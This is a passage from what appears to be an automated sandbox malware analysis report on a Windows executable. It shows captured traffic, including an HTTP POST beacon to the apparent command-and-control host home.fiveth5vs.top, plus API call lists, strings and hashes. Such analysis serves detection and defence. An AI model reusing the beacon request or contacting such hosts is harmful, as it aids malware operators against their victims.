                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.9 | 49708 | 176.53.146.223 | 80 | 1136 | C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Dec 31, 2024 09:45:31.507883072 CET | 171 | OUT | POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Content-Type: application/json
                            Content-Length: 31
                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                            Data Ascii: { "id1": "0", "data": "Done1" }
                            Dec 31, 2024 09:45:32.606327057 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:32 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.9 | 49705 | 34.200.57.114 | 443 | 1136 | C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-12-31 08:45:22 UTC | 52 | OUT | GET /ip HTTP/1.1
                            Host: httpbin.org
                            Accept: */*
                            2024-12-31 08:45:22 UTC | 224 | IN | HTTP/1.1 200 OK
                            Date: Tue, 31 Dec 2024 08:45:22 GMT
                            Content-Type: application/json
                            Content-Length: 31
                            Connection: close
                            Server: gunicorn/19.9.0
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Credentials: true
                            2024-12-31 08:45:22 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                            Data Ascii: { "origin": "8.46.123.189"}



                            Target ID:0
                            Start time:03:45:17
                            Start date:31/12/2024
                            Path:C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\ivHDHq51Ar.exe"
                            Imagebase:0x150000
                            File size:4'514'816 bytes
                            MD5 hash:27B03055C39DAAB2CE7AE0C5A369F0F1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:2.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:20.8%
                              Total number of Nodes:221
                              Total number of Limit Nodes:30
                              execution_graph: [node/edge dump of the rendered graph omitted; it is not readable as text. APIs reached on the graph: closesocket, gethostname, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegCloseKey, GetBestRoute2, socket, ioctlsocket, connect, getsockname, recvfrom, send, WSAGetLastError, WSAStartup, WSAIoctl, WSAEventSelect, WSAEnumNetworkEvents, WSACloseEvent, select, setsockopt, SleepEx, CloseHandle, GetSystemInfo, GlobalMemoryStatusEx, KiUserCallbackDispatcher, GetDriveTypeA, GetDiskFreeSpaceExA, FindFirstFileW, FindNextFileW, FindFirstFileA, CharUpperA, QueryFullProcessImageNameA]
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                              • API String ID: 0-1590685507
                              • Opcode ID: c582618644bc30ca35e5807de34548787c1bf542abf103c4bdd6b30368e1b46f
                              • Instruction ID: 5e111f44186e3ffa4e5d54fd645d3884b7eb4d60c8efdcc2abaabe39a26846aa
                              • Opcode Fuzzy Hash: c582618644bc30ca35e5807de34548787c1bf542abf103c4bdd6b30368e1b46f
                              • Instruction Fuzzy Hash: 94C2B131A043449FDB14DF29C484B6AB7E1BF88314F19866DEC989B292D771EA85CF81

                              Control-flow Graph

                              APIs
                              • GetSystemInfo.KERNELBASE ref: 00152579
                              • GlobalMemoryStatusEx.KERNELBASE ref: 001525CC
                              • GetDriveTypeA.KERNELBASE ref: 00152647
                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0015267E
                              • KiUserCallbackDispatcher.NTDLL ref: 001527E2
                              • FindFirstFileW.KERNELBASE ref: 001528F8
                              • FindNextFileW.KERNELBASE ref: 0015291F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                              • String ID: @$`$gko
                              • API String ID: 3271271169-3173616720
                              • Opcode ID: b76237ea7cfcf6047d3ec9f8768dfb61ba9b3bbc39019abbaa65bba9a5d14d13
                              • Instruction ID: e13ef9d906d448a6be158c151be3e536bf79490053051c0a5745dc3052c3f9f2
                              • Opcode Fuzzy Hash: b76237ea7cfcf6047d3ec9f8768dfb61ba9b3bbc39019abbaa65bba9a5d14d13
                              • Instruction Fuzzy Hash: F4D1A0B49053199FCB40EF68C98569EBBF1BF48304F00896EE898D7351E7349A94CF96

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: [basic-block/edge dump of the rendered graph omitted; it is not readable as text. Function at 1529ff; APIs on the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle]
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                              • String ID: 0$Alo
                              • API String ID: 2406880114-760137831
                              • Opcode ID: e0848b366a0e3d377b36fb231abd56286c32c098f95146bccb6b0d98a30192d6
                              • Instruction ID: e48ac3d19fa373b8ebfe8e4c522a4cddbf095473c397372028d7c55466971423
                              • Opcode Fuzzy Hash: e0848b366a0e3d377b36fb231abd56286c32c098f95146bccb6b0d98a30192d6
                              • Instruction Fuzzy Hash: 58E1E4B4904309DFCB50EF68D9856AEBBF5AF45304F00886EE998DB350E7749998CF42

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: [basic-block/edge dump of the rendered graph omitted; it is not readable as text. Function at 1605b0; APIs on the graph: WSAEventSelect, WSAEnumNetworkEvents]
                              APIs
                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00160712
                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001609DD
                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001609FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: EventSelect$EnumEventsNetwork
                              • String ID: multi.c
                              • API String ID: 2170980988-214371023
                              • Opcode ID: f3739dc284c8150eb7b38b81c9b5f4c80ef51976a9afb7101706a617de5eae5d
                              • Instruction ID: e4deb976859c1cb251088681a1319bfa0943854e11aa41d9ef1116c36785b06a
                              • Opcode Fuzzy Hash: f3739dc284c8150eb7b38b81c9b5f4c80ef51976a9afb7101706a617de5eae5d
                              • Instruction Fuzzy Hash: 8BD19E756083019FE712CF64CC81B6B77E9BF98348F04482CF99987282E774E968CB52

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph: [basic-block/edge dump of the rendered graph omitted; it is not readable as text. Function at 21b180; API on the graph: getsockname]
                              APIs
                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0021B2B7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: getsockname
                              • String ID: ares__sortaddrinfo.c$cur != NULL
                              • API String ID: 3358416759-2430778319
                              • Opcode ID: d649673243417f5040f7e6ff4b283ff0b22167315bf80be149d6688ff7014bb0
                              • Instruction ID: 1fee62c29653a3cee887206b01132cc56af0c9ea5f855bbb461659904ed375b9
                              • Opcode Fuzzy Hash: d649673243417f5040f7e6ff4b283ff0b22167315bf80be149d6688ff7014bb0
                              • Instruction Fuzzy Hash: C4C170716143059FD719DF24C890AAAB7F2FFA8344F44886CE8498B3A1D735EDA5CB81
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea8d73eef847a1bcdbb29f0e287da3fb6e526487db8fa1823853c71190f063af
                              • Instruction ID: 019b210cc4bdf6ab1ee1234903725a0ee897f0d9f4fbd2e4eb257a0f0e6ece95
                              • Opcode Fuzzy Hash: ea8d73eef847a1bcdbb29f0e287da3fb6e526487db8fa1823853c71190f063af
                              • Instruction Fuzzy Hash: E291133060D3094BD7358A29CC907BBB2D9FFC5368F148B2DE8A9432D4EB759C60D691
                              APIs
                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0020712E,?,?,?,00001001,00000000), ref: 0021A90C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: recvfrom
                              • String ID:
                              • API String ID: 846543921-0
                              • Opcode ID: daf188627fcd73b6d844d299c8a0f87a9ad51106b5127e6cfeaaeec1aa790941
                              • Instruction ID: 8bcc7f12d3740a6ba3f18f69b235356dff86f56faf7fc32ea89763171a4c993a
                              • Opcode Fuzzy Hash: daf188627fcd73b6d844d299c8a0f87a9ad51106b5127e6cfeaaeec1aa790941
                              • Instruction Fuzzy Hash: 3CF06D75119308AFD2209E01DC44DABBBEDEFC9764F05456DF948232118271AE50CAB2
                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0020AA19
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0020AA4C
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0020AA97
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0020AAE9
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0020AB30
                              • RegCloseKey.KERNELBASE(?), ref: 0020AB6A
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0020AB82
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0020AC46
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0020AD0A
                              • RegEnumKeyExA.KERNELBASE ref: 0020AD8D
                              • RegCloseKey.KERNELBASE(?), ref: 0020ADD9
                              • RegEnumKeyExA.KERNELBASE ref: 0020AE08
                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0020AE2A
                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0020AE54
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0020AF63
                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0020AFB2
                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0020B072
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: QueryValue$Open$CloseEnum
                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                              • API String ID: 4217438148-1047472027
                              • Opcode ID: 41dbf1d862c61a53b48e4b0037c3c9f80e46ff1317eb173321a216531bdcb598
                              • Instruction ID: f0999e5279d3d62164d3461a32f07fb7438130fd99132e3d1b0fce25d423bef6
                              • Opcode Fuzzy Hash: 41dbf1d862c61a53b48e4b0037c3c9f80e46ff1317eb173321a216531bdcb598
                              • Instruction Fuzzy Hash: 8D72C0B1624302AFE3209F24CC81B6BB7E8AF85700F545828F989D72D2E775E954CB53
                              APIs
                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0018A831
                              Strings
                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 0018ADAC
                              • @, xrefs: 0018A8F4
                              • Local Interface %s is ip %s using address family %i, xrefs: 0018AE60
                              • @, xrefs: 0018AC42
                              • Bind to local port %d failed, trying next, xrefs: 0018AFE5
                              • bind failed with errno %d: %s, xrefs: 0018B080
                              • Trying [%s]:%d..., xrefs: 0018A689
                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0018A6CE
                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 0018AE1F
                              • cf-socket.c, xrefs: 0018A5CD, 0018A735
                              • Could not set TCP_NODELAY: %s, xrefs: 0018A871
                              • cf_socket_open() -> %d, fd=%d, xrefs: 0018A796
                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0018AD0A
                              • Trying %s:%d..., xrefs: 0018A7C2, 0018A7DE
                              • Local port: %hu, xrefs: 0018AF28
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmp
